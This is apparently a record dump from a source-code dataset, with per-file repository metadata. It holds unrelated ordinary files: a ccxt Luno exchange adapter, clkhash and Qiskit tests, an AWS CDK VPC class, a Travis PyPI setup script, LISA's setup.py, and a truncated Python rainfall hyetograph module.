"internal/future_then_impl.h",
"internal/future_then_meta.h",
"internal/getenv.h",
"internal/invoke_result.h",
"internal/ios_flags_saver.h",
"internal/log_impl.h",
"internal/pagination_range.h",
"internal/parse_rfc3339.h",
"internal/port_platform.h",
"internal/random.h",
"internal/retry_policy.h",
"internal/setenv.h",
"internal/strerror.h",
"internal/throw_delegate.h",
"internal/tuple.h",
"internal/type_list.h",
"internal/user_agent_prefix.h",
"internal/utility.h",
"internal/version_info.h",
"kms_key_name.h",
"log.h",
"optional.h",
"options.h",
"polling_policy.h",
"project.h",
"status.h",
"status_or.h",
"stream_range.h",
"terminate_handler.h",
"tracing_options.h",
"version.h",
]
google_cloud_cpp_common_srcs = [
"credentials.cc",
"iam_bindings.cc",
"iam_policy.cc",
"internal/api_client_header.cc",
"internal/backoff_policy.cc",
"internal/base64_transforms.cc",
"internal/compiler_info.cc",
"internal/credentials_impl.cc",
"internal/filesystem.cc",
"internal/format_time_point.cc",
"internal/future_impl.cc",
"internal/getenv.cc",
"internal/log_impl.cc",
"internal/parse_rfc3339.cc",
"internal/random.cc",
"internal/retry_policy.cc",
"internal/setenv.cc",
"internal/strerror.cc",
"internal/throw_delegate.cc",
"internal/user_agent_prefix.cc",
"kms_key_name.cc",
"log.cc",
"options.cc",
"project.cc",
"status.cc",
"terminate_handler.cc",
"tracing_options.cc",
"version.cc",
]
| 29.40708
| 85
| 0.683419
|
493c85b37c20d135f0dc051cc64b9b6479d6c563
| 64
|
py
|
Python
|
Task/Arrays/Python/arrays-3.py
|
LaudateCorpus1/RosettaCodeData
|
9ad63ea473a958506c041077f1d810c0c7c8c18d
|
[
"Info-ZIP"
] | 5
|
2021-01-29T20:08:05.000Z
|
2022-03-22T06:16:05.000Z
|
Task/Arrays/Python/arrays-3.py
|
seanwallawalla-forks/RosettaCodeData
|
9ad63ea473a958506c041077f1d810c0c7c8c18d
|
[
"Info-ZIP"
] | null | null | null |
Task/Arrays/Python/arrays-3.py
|
seanwallawalla-forks/RosettaCodeData
|
9ad63ea473a958506c041077f1d810c0c7c8c18d
|
[
"Info-ZIP"
] | 1
|
2018-11-09T22:08:40.000Z
|
2018-11-09T22:08:40.000Z
|
myArray = [[0]* width] * height] # DOES NOT WORK AS INTENDED!!!
| 32
| 63
| 0.625
|
35c24b12f13b68cc002d7f4dc94f45a3d224501c
| 351
|
py
|
Python
|
arxiv_cli/utils.py
|
jacquerie/arxiv-cli
|
ba07ba0f2a6ade3fbb2a9b87e79437e55a2fab17
|
[
"MIT"
] | 8
|
2017-10-22T15:49:48.000Z
|
2020-07-31T22:31:42.000Z
|
arxiv_cli/utils.py
|
jacquerie/arxiv-cli
|
ba07ba0f2a6ade3fbb2a9b87e79437e55a2fab17
|
[
"MIT"
] | 2
|
2017-10-22T12:32:26.000Z
|
2017-10-22T17:30:27.000Z
|
arxiv_cli/utils.py
|
jacquerie/arxiv-cli
|
ba07ba0f2a6ade3fbb2a9b87e79437e55a2fab17
|
[
"MIT"
] | 1
|
2018-02-18T16:28:48.000Z
|
2018-02-18T16:28:48.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from time import sleep
def drip(f, l, t=0):
result = []
if l:
for el in l[:-1]:
result.append(f(el))
sleep(t)
result.append(f(l[-1]))
return result
def has(d, k):
return k in d and d[k] is not None
| 15.954545
| 64
| 0.555556
|
c843d706a2d39173c8800fe8938fede5cd92ace3
| 10,576
|
py
|
Python
|
python/ccxt/async_support/luno.py
|
KaceyBolman/ccxt
|
d34a0651b209ac77453f05c4ce31883f0cd2d6b8
|
[
"MIT"
] | 1
|
2017-10-16T01:59:45.000Z
|
2017-10-16T01:59:45.000Z
|
python/ccxt/async_support/luno.py
|
rerefreshing/ccxt
|
7c50f338dcb282c0aee4d69a1ac4ca47255fdf15
|
[
"MIT"
] | null | null | null |
python/ccxt/async_support/luno.py
|
rerefreshing/ccxt
|
7c50f338dcb282c0aee4d69a1ac4ca47255fdf15
|
[
"MIT"
] | 2
|
2019-03-14T15:17:46.000Z
|
2019-09-08T19:26:04.000Z
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import base64
from ccxt.base.errors import ExchangeError
class luno (Exchange):
def describe(self):
return self.deep_extend(super(luno, self).describe(), {
'id': 'luno',
'name': 'luno',
'countries': ['GB', 'SG', 'ZA'],
'rateLimit': 10000,
'version': '1',
'has': {
'CORS': False,
'fetchTickers': True,
'fetchOrder': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766607-8c1a69d8-5ede-11e7-930c-540b5eb9be24.jpg',
'api': 'https://api.mybitx.com/api',
'www': 'https://www.luno.com',
'doc': [
'https://www.luno.com/en/api',
'https://npmjs.org/package/bitx',
'https://github.com/bausmeier/node-bitx',
],
},
'api': {
'public': {
'get': [
'orderbook',
'ticker',
'tickers',
'trades',
],
},
'private': {
'get': [
'accounts/{id}/pending',
'accounts/{id}/transactions',
'balance',
'fee_info',
'funding_address',
'listorders',
'listtrades',
'orders/{id}',
'quotes/{id}',
'withdrawals',
'withdrawals/{id}',
],
'post': [
'accounts',
'postorder',
'marketorder',
'stoporder',
'funding_address',
'withdrawals',
'send',
'quotes',
'oauth2/grant',
],
'put': [
'quotes/{id}',
],
'delete': [
'quotes/{id}',
'withdrawals/{id}',
],
},
},
})
async def fetch_markets(self):
markets = await self.publicGetTickers()
result = []
for p in range(0, len(markets['tickers'])):
market = markets['tickers'][p]
id = market['pair']
base = id[0:3]
quote = id[3:6]
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetBalance()
balances = response['balance']
result = {'info': response}
for b in range(0, len(balances)):
balance = balances[b]
currency = self.common_currency_code(balance['asset'])
reserved = float(balance['reserved'])
unconfirmed = float(balance['unconfirmed'])
account = {
'free': 0.0,
'used': self.sum(reserved, unconfirmed),
'total': float(balance['balance']),
}
account['free'] = account['total'] - account['used']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
orderbook = await self.publicGetOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = orderbook['timestamp']
return self.parse_order_book(orderbook, timestamp, 'bids', 'asks', 'price', 'volume')
def parse_order(self, order, market=None):
timestamp = order['creation_timestamp']
status = 'open' if (order['state'] == 'PENDING') else 'closed'
side = 'sell' if (order['type'] == 'ASK') else 'buy'
symbol = None
if market:
symbol = market['symbol']
price = self.safe_float(order, 'limit_price')
amount = self.safe_float(order, 'limit_volume')
quoteFee = self.safe_float(order, 'fee_counter')
baseFee = self.safe_float(order, 'fee_base')
fee = {'currency': None}
if quoteFee:
fee['side'] = 'quote'
fee['cost'] = quoteFee
else:
fee['side'] = 'base'
fee['cost'] = baseFee
return {
'id': order['order_id'],
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': None,
'side': side,
'price': price,
'amount': amount,
'filled': None,
'remaining': None,
'trades': None,
'fee': fee,
'info': order,
}
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
response = await self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def parse_ticker(self, ticker, market=None):
timestamp = ticker['timestamp']
symbol = None
if market:
symbol = market['symbol']
last = self.safe_float(ticker, 'last_trade')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': self.safe_float(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_float(ticker, 'ask'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'rolling_24_hour_volume'),
'quoteVolume': None,
'info': ticker,
}
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
response = await self.publicGetTickers(params)
tickers = self.index_by(response['tickers'], 'pair')
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = self.markets_by_id[id]
symbol = market['symbol']
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
ticker = await self.publicGetTicker(self.extend({
'pair': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_trade(self, trade, market):
side = 'buy' if (trade['is_buy']) else 'sell'
return {
'info': trade,
'id': None,
'order': None,
'timestamp': trade['timestamp'],
'datetime': self.iso8601(trade['timestamp']),
'symbol': market['symbol'],
'type': None,
'side': side,
'price': self.safe_float(trade, 'price'),
'amount': self.safe_float(trade, 'volume'),
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
if since is not None:
request['since'] = since
response = await self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response['trades'], market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
method = 'privatePost'
order = {'pair': self.market_id(symbol)}
if type == 'market':
method += 'Marketorder'
order['type'] = side.upper()
if side == 'buy':
order['counter_volume'] = amount
else:
order['base_volume'] = amount
else:
method += 'Postorder'
order['volume'] = amount
order['price'] = price
if side == 'buy':
order['type'] = 'BID'
else:
order['type'] = 'ASK'
response = await getattr(self, method)(self.extend(order, params))
return {
'info': response,
'id': response['order_id'],
}
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
return await self.privatePostStoporder({'order_id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
if api == 'private':
self.check_required_credentials()
auth = self.encode(self.apiKey + ':' + self.secret)
auth = base64.b64encode(auth)
headers = {'Authorization': 'Basic ' + self.decode(auth)}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
async def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = await self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
| 36.095563
| 126
| 0.480144
|
a47741d10ccb29ce36cf1b59f10e6b6ef47e73e4
| 7,251
|
py
|
Python
|
tests/test_schema.py
|
hardbyte/clkhash
|
b118269a6db3f42f9967786c417a3f03adda125c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_schema.py
|
hardbyte/clkhash
|
b118269a6db3f42f9967786c417a3f03adda125c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_schema.py
|
hardbyte/clkhash
|
b118269a6db3f42f9967786c417a3f03adda125c
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
import io
import json
import os
import unittest
from clkhash import schema
from clkhash.schema import SchemaError, MasterSchemaError
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__),
'..', 'clkhash', 'data')
TEST_DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'testdata')
def _test_data_file_path(file_name):
return os.path.join(TEST_DATA_DIRECTORY, file_name)
def _schema_dict(dir_name, file_name):
with open(os.path.join(dir_name, file_name)) as f:
return json.load(f)
class TestSchemaValidation(unittest.TestCase):
def test_good_schema(self):
# These are some perfectly fine schemas.
with open(_test_data_file_path('good-schema-v1.json')) as f:
schema.from_json_file(f)
def test_good_schema_repr(self):
with open(_test_data_file_path('good-schema-v1.json')) as f:
s = schema.from_json_file(f)
schema_repr = repr(s)
assert "v2" in schema_repr # v1 schema is converted to v2
assert "12 fields" in schema_repr
def test_invalid_schema(self):
# This schema is not valid (missing encoding in its feature).
with open(_test_data_file_path('bad-schema-v1.json')) as f:
with self.assertRaises(SchemaError):
schema.from_json_file(f)
def test_valid_but_unsupported_schema(self):
# This schema has an unsupported version.
with open(_test_data_file_path(
'good-but-unsupported-schema-v1.json')) as f:
with self.assertRaises(SchemaError):
schema.from_json_file(f)
def test_invalid_json_schema(self):
invalid_schema_file = io.StringIO('{') # Invalid json.
msg = 'Invalid JSON in schema should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_list_schema(self):
invalid_schema_file = io.StringIO('[]') # Must be dict instead.
msg = 'List as top element should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_string_schema(self):
invalid_schema_file = io.StringIO('"foo"') # Must be dict.
msg = 'Literal as top element should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_no_version(self):
invalid_schema_file = io.StringIO('{}') # Missing version.
msg = 'Schema with no version should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_missing_master(self):
# This shouldn't happen but we need to be able to handle it if,
# for example, we have a corrupt install.
original_paths = schema.MASTER_SCHEMA_FILE_NAMES
schema.MASTER_SCHEMA_FILE_NAMES = {1: 'nonexistent.json'}
msg = 'Missing master schema should raise MasterSchemaError.'
with self.assertRaises(MasterSchemaError, msg=msg):
schema.validate_schema_dict({'version': 1})
schema.MASTER_SCHEMA_FILE_NAMES = original_paths
def test_convert_v1_to_v2(self):
schema_v1 = _schema_dict(DATA_DIRECTORY, 'randomnames-schema.json')
schema.validate_schema_dict(schema_v1)
schema_v2 = schema.convert_v1_to_v2(schema_v1)
schema.validate_schema_dict(schema_v2)
def test_good_schema2_repr(self):
with open(_test_data_file_path('good-schema-v2.json')) as f:
s = schema.from_json_file(f)
schema_repr = repr(s)
assert "v2" in schema_repr
assert "12 fields" in schema_repr
class TestSchemaLoading(unittest.TestCase):
def test_issue_111(self):
schema_dict = {
'version': 1,
'clkConfig': {
'l': 1024,
'k': 20,
'hash': {
'type': 'doubleHash'},
'kdf': {
'type': 'HKDF'}},
'features': [
{
'identifier': 'rec_id',
'ignored': True},
{
'identifier': 'given_name',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'surname',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'street_number',
'format': {
'type': 'integer'},
'hashing': {
'ngram': 1,
'positional': True,
'weight': 1 }},
{
'identifier': 'address_1',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'address_2',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'suburb',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'postcode',
'format': {
'type': 'integer',
'minimum': 1000,
'maximum': 9999},
'hashing': {
'ngram': 1,
'positional': True,
'weight': 1}},
{
'identifier': 'state',
'format': {
'type': 'string',
'encoding': 'utf-8',
'maxLength': 3},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'day_of_birth',
'format': {
'type': 'integer'},
'hashing': {
'ngram': 1,
'positional': True,
'weight': 1}},
{
'identifier': 'soc_sec_id',
'ignored': True}
]
}
# This fails in #111. Now it shouldn't.
schema.from_json_dict(schema_dict)
| 36.621212
| 75
| 0.481313
|
c5c4dca5e475665cd860725ae4c757cdcf07464c
| 1,845
|
py
|
Python
|
test/python/circuit/test_circuit_multi_registers.py
|
ismaila-at-za-ibm/qiskit-terra
|
08303ec98ac7b33fde55266dc3a74466fbdcae95
|
[
"Apache-2.0"
] | 1
|
2020-09-03T12:28:44.000Z
|
2020-09-03T12:28:44.000Z
|
test/python/circuit/test_circuit_multi_registers.py
|
ismaila-at-za-ibm/qiskit-terra
|
08303ec98ac7b33fde55266dc3a74466fbdcae95
|
[
"Apache-2.0"
] | null | null | null |
test/python/circuit/test_circuit_multi_registers.py
|
ismaila-at-za-ibm/qiskit-terra
|
08303ec98ac7b33fde55266dc3a74466fbdcae95
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=unused-import
# pylint: disable=redefined-builtin
"""Test Qiskit's QuantumCircuit class for multiple registers."""
import os
import tempfile
import unittest
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit
from qiskit import QiskitError
from qiskit.converters.circuit_to_dag import circuit_to_dag
from qiskit.test import QiskitTestCase
class TestCircuitMultiRegs(QiskitTestCase):
"""QuantumCircuit Qasm tests."""
def test_circuit_multi(self):
"""Test circuit multi regs declared at start.
"""
qreg0 = QuantumRegister(2, 'q0')
creg0 = ClassicalRegister(2, 'c0')
qreg1 = QuantumRegister(2, 'q1')
creg1 = ClassicalRegister(2, 'c1')
circ = QuantumCircuit(qreg0, qreg1)
circ.x(qreg0[1])
circ.x(qreg1[0])
meas = QuantumCircuit(qreg0, qreg1, creg0, creg1)
meas.measure(qreg0, creg0)
meas.measure(qreg1, creg1)
qc = circ + meas
circ2 = QuantumCircuit()
circ2.add_register(qreg0)
circ2.add_register(qreg1)
circ2.x(qreg0[1])
circ2.x(qreg1[0])
meas2 = QuantumCircuit()
meas2.add_register(qreg0)
meas2.add_register(qreg1)
meas2.add_register(creg0)
meas2.add_register(creg1)
meas2.measure(qreg0, creg0)
meas2.measure(qreg1, creg1)
qc2 = circ2 + meas2
dag_qc = circuit_to_dag(qc)
dag_qc2 = circuit_to_dag(qc2)
dag_circ2 = circuit_to_dag(circ2)
dag_circ = circuit_to_dag(circ)
self.assertEqual(dag_qc, dag_qc2)
self.assertEqual(dag_circ, dag_circ2)
| 27.954545
| 77
| 0.663415
|
c4acf9be2b29cf8f4c1e94757394268d98c28766
| 987
|
py
|
Python
|
transit-gw-example/transitgw/public_vpc.py
|
philbasford/adv_networking_demos
|
4d00cdbcdc563434f9e57bcb27217ee0d8b787be
|
[
"Apache-2.0"
] | 1
|
2021-07-17T09:43:21.000Z
|
2021-07-17T09:43:21.000Z
|
transit-gw-example/transitgw/public_vpc.py
|
philbasford/adv_networking_demos
|
4d00cdbcdc563434f9e57bcb27217ee0d8b787be
|
[
"Apache-2.0"
] | null | null | null |
transit-gw-example/transitgw/public_vpc.py
|
philbasford/adv_networking_demos
|
4d00cdbcdc563434f9e57bcb27217ee0d8b787be
|
[
"Apache-2.0"
] | null | null | null |
"""The following file is released under the Apache 2 Licence, see LICENCE.txt."""
from aws_cdk import (
aws_ec2 as ec2,
core as cdk
)
from transitgw.jump_server import JumpServer
class PublicVPC(ec2.Vpc):
"""A VPC that only contains 3 public subnets with not NATs but does contain a IGW.
Args:
ec2 ([type]): The base VPC class that we will extend to customise the VPC
"""
def __init__(self, stack: cdk.Stack, prefix, cidr, **kwargs) -> None:
super().__init__(
stack,
id=prefix,
cidr=cidr,
enable_dns_hostnames=True,
enable_dns_support=True,
nat_gateways=0,
subnet_configuration=[
ec2.SubnetConfiguration(
name='public-subnet',
subnet_type=ec2.SubnetType.PUBLIC,
cidr_mask=24
)
],
max_azs=3
)
JumpServer(stack, prefix, self)
| 26.675676
| 86
| 0.561297
|
9e10bb9700c3b1ca49e99f5c08f8c1f9ae30051b
| 4,084
|
py
|
Python
|
travis_pypi_setup.py
|
vilkasgroup/epages_client
|
10e63d957ee45dc5d4df741064806f724fb1be1f
|
[
"MIT"
] | 3
|
2018-01-26T13:44:26.000Z
|
2020-05-13T13:58:19.000Z
|
travis_pypi_setup.py
|
vilkasgroup/epages_client
|
10e63d957ee45dc5d4df741064806f724fb1be1f
|
[
"MIT"
] | 53
|
2018-02-05T10:59:22.000Z
|
2022-01-01T19:31:08.000Z
|
travis_pypi_setup.py
|
vilkasgroup/epages_client
|
10e63d957ee45dc5d4df741064806f724fb1be1f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update encrypted deploy password in Travis config file."""
from __future__ import print_function
import base64
import json
import os
from getpass import getpass
import yaml
from cryptography.hazmat.primitives.serialization import load_pem_public_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
GITHUB_REPO = 'vilkasgroup/epages_client'
TRAVIS_CONFIG_FILE = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.travis.yml')
def load_key(pubkey):
"""Load public RSA key.
Work around keys with incorrect header/footer format.
Read more about RSA encryption with cryptography:
https://cryptography.io/latest/hazmat/primitives/asymmetric/rsa/
"""
try:
return load_pem_public_key(pubkey.encode(), default_backend())
except ValueError:
# workaround for https://github.com/travis-ci/travis-api/issues/196
pubkey = pubkey.replace('BEGIN RSA', 'BEGIN').replace('END RSA', 'END')
return load_pem_public_key(pubkey.encode(), default_backend())
def encrypt(pubkey, password):
"""Encrypt password using given RSA public key and encode it with base64.
The encrypted password can only be decrypted by someone with the
private key (in this case, only Travis).
"""
key = load_key(pubkey)
encrypted_password = key.encrypt(password, PKCS1v15())
return base64.b64encode(encrypted_password)
def fetch_public_key(repo):
"""Download RSA public key Travis will use for this repo.
Travis API docs: http://docs.travis-ci.com/api/#repository-keys
"""
keyurl = 'https://api.travis-ci.org/repos/{0}/key'.format(repo)
data = json.loads(urlopen(keyurl).read().decode())
if 'key' not in data:
errmsg = "Could not find public key for repo: {}.\n".format(repo)
errmsg += "Have you already added your GitHub repo to Travis?"
raise ValueError(errmsg)
return data['key']
def prepend_line(filepath, line):
"""Rewrite a file adding a line to its beginning."""
with open(filepath) as f:
lines = f.readlines()
lines.insert(0, line)
with open(filepath, 'w') as f:
f.writelines(lines)
def load_yaml_config(filepath):
"""Load yaml config file at the given path."""
with open(filepath) as f:
return yaml.load(f)
def save_yaml_config(filepath, config):
"""Save yaml config file at the given path."""
with open(filepath, 'w') as f:
yaml.dump(config, f, default_flow_style=False)
def update_travis_deploy_password(encrypted_password):
"""Put `encrypted_password` into the deploy section of .travis.yml."""
config = load_yaml_config(TRAVIS_CONFIG_FILE)
config['deploy']['password'] = dict(secure=encrypted_password)
save_yaml_config(TRAVIS_CONFIG_FILE, config)
line = ('# This file was autogenerated and will overwrite'
' each time you run travis_pypi_setup.py\n')
prepend_line(TRAVIS_CONFIG_FILE, line)
def main(args):
"""Add a PyPI password to .travis.yml so that Travis can deploy to PyPI.
Fetch the Travis public key for the repo, and encrypt the PyPI password
with it before adding, so that only Travis can decrypt and use the PyPI
password.
"""
public_key = fetch_public_key(args.repo)
password = args.password or getpass('PyPI password: ')
update_travis_deploy_password(encrypt(public_key, password.encode()))
print("Wrote encrypted password to .travis.yml -- you're ready to deploy")
if '__main__' == __name__:
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--repo', default=GITHUB_REPO,
help='GitHub repo (default: %s)' % GITHUB_REPO)
parser.add_argument('--password',
help='PyPI password (will prompt if not provided)')
args = parser.parse_args()
main(args)
| 31.90625
| 79
| 0.701273
|
858e9424f3e9281d8c2a7bc3f08490974af3eb1c
| 3,981
|
py
|
Python
|
setup.py
|
PierreARM/lisa
|
e9cfbd63b25821518f1254ed7905b505a5073450
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
PierreARM/lisa
|
e9cfbd63b25821518f1254ed7905b505a5073450
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
PierreARM/lisa
|
e9cfbd63b25821518f1254ed7905b505a5073450
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python3
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2018, Arm Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import itertools
from setuptools import setup, find_namespace_packages
with open('README.rst', 'r') as f:
long_description = f.read()
with open('LICENSE.txt', 'r') as f:
license_txt = f.read()
with open("lisa/version.py") as f:
version_globals = dict()
exec(f.read(), version_globals)
lisa_version = version_globals['__version__']
packages = find_namespace_packages(where='lisa', include=['lisa*'])
package_data = {
package: ['*']
for package in packages
if package.startswith('lisa.assets.')
}
package_data['lisa.assets'] = ['*']
extras_require={
"notebook": [
"jupyterlab",
"ipympl", # For %matplotlib widget under jupyter lab
"sphobjinv", # To open intersphinx inventories
],
"test": [
"pytest",
],
"wa": [
"wlauto",
],
}
extras_require["doc"] = [
"sphinx >= 1.8",
"sphinx_rtd_theme",
"sphinxcontrib-plantuml",
"nbsphinx",
# Add all the other optional dependencies to ensure all modules from lisa
# can safely be imported
*itertools.chain.from_iterable(extras_require.values())
]
setup(
name='LISA',
license=license_txt,
version=lisa_version,
author='Arm Ltd',
# TODO: figure out which email to put here
# author_email=
packages=packages,
url='https://github.com/ARM-software/lisa',
project_urls={
"Bug Tracker": "https://github.com/ARM-software/lisa/issues",
"Documentation": "https://lisa-linux-integrated-system-analysis.readthedocs.io/",
"Source Code": "https://github.com/ARM-software/lisa",
},
description='A stick to probe the kernel with',
long_description=long_description,
python_requires='>= 3.6',
install_requires=[
"psutil >= 4.4.2",
# Figure.savefig() (without pyplot) does not work in matplotlib <
# 3.1.0, and that is used for non-interactive plots when building the
# doc.
"matplotlib >= 3.1.0",
# Pandas >= 1.0.0 has support for new nullable dtypes
# Pandas 1.2.0 has broken barplots:
# https://github.com/pandas-dev/pandas/issues/38947
"pandas >= 1.0.0",
"numpy",
"scipy",
# Earlier versions have broken __slots__ deserialization
"ruamel.yaml >= 0.16.6",
# For the HTML output of analysis plots
"docutils",
# For pandas.to_parquet() dataframe storage
"pyarrow",
"ipython",
"ipywidgets",
"mplcursors",
# Depdendencies that are shipped as part of the LISA repo as
# subtree/submodule
"devlib",
],
extras_require=extras_require,
package_data=package_data,
classifiers=[
"Programming Language :: Python :: 3 :: Only",
# This is not a standard classifier, as there is nothing defined for
# Apache 2.0 yet:
# https://pypi.org/classifiers/
"License :: OSI Approved :: Apache Software License 2.0 (Apache-2.0)",
# It has not been tested under any other OS
"Operating System :: POSIX :: Linux",
"Topic :: System :: Operating System Kernels :: Linux",
"Topic :: Software Development :: Testing",
"Intended Audience :: Developers",
],
)
# vim :set tabstop=4 shiftwidth=4 textwidth=80 expandtab
| 29.932331
| 89
| 0.642301
|
e4a9be5224cea88db68cb6008068a5c6ccb0cfaa
| 789
|
py
|
Python
|
django_deployer/paas_templates/gondor/settings_gondor.py
|
natea/django-deployer
|
5ce7d972db2f8500ec53ad89e7eb312d3360d074
|
[
"MIT"
] | 19
|
2015-02-06T06:14:39.000Z
|
2021-01-06T22:27:03.000Z
|
django_deployer/paas_templates/gondor/settings_gondor.py
|
natea/django-deployer
|
5ce7d972db2f8500ec53ad89e7eb312d3360d074
|
[
"MIT"
] | null | null | null |
django_deployer/paas_templates/gondor/settings_gondor.py
|
natea/django-deployer
|
5ce7d972db2f8500ec53ad89e7eb312d3360d074
|
[
"MIT"
] | 2
|
2015-12-22T17:22:15.000Z
|
2016-03-02T12:15:01.000Z
|
import os
import dj_database_url
from .settings import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
"default": dj_database_url.config(env="GONDOR_DATABASE_URL"),
}
MEDIA_ROOT = os.path.join(os.environ["GONDOR_DATA_DIR"], "site_media", "media")
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {
"format": "%(levelname)s %(message)s"
},
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "simple"
}
},
"loggers": {
"": {
"handlers": ["console"],
"level": "INFO",
},
"django.request": {
"propagate": True,
},
}
}
| 19.725
| 79
| 0.505703
|
aa2904d64fbb70236f86bd6597f6aef941bef118
| 4,278
|
py
|
Python
|
idf_to_hyetograph.py
|
yuriishizawa/idf_to_hyetograph
|
833040cf08dd9aee676c9aaaf454711322446f36
|
[
"MIT"
] | null | null | null |
idf_to_hyetograph.py
|
yuriishizawa/idf_to_hyetograph
|
833040cf08dd9aee676c9aaaf454711322446f36
|
[
"MIT"
] | null | null | null |
idf_to_hyetograph.py
|
yuriishizawa/idf_to_hyetograph
|
833040cf08dd9aee676c9aaaf454711322446f36
|
[
"MIT"
] | null | null | null |
"""
Created by Yuri Ishizawa
e-mail: yuriishizawa@gmail.com
2021
"""
import csv
import matplotlib.pyplot as plt
import pandas as pd
class idf_to_hyetograph:
def __init__(self, K, a, b, c, T, td, dt):
self.K, self.a, self.b, self.c, self.T, self.td, self.dt = K, a, b, c, T, td, dt
if td%dt == 0 and td >= dt:
print("Módulo iniciado")
elif td%dt != 0 and td >= dt:
print("ATENÇÃO: O passo de tempo (dt) deve ser um divisor do tempo de duração (td) da chuva")
else:
print("ATENÇÃO: O passo de tempo (dt) deve ser menor que o tempo de duração (td) da chuva")
def idf(self,t):
intensity = ((self.K*(self.T**self.a))/((t + self.b)**self.c))
return intensity
def calc_dP_t(self):
intensity = []
P = []
dP = []
self.dP_t = []
for i,j in enumerate(list(range(self.dt,self.td+1,self.dt))):
intensity.append(self.idf(j))
P.append(intensity[i]*j/60)
if j == self.dt:
dP.append(P[i])
else:
dP.append(P[i] - P[i-1])
self.dP_t.append(dP[i]*60/self.dt)
self.dP_t.sort()
def calc_h(self):
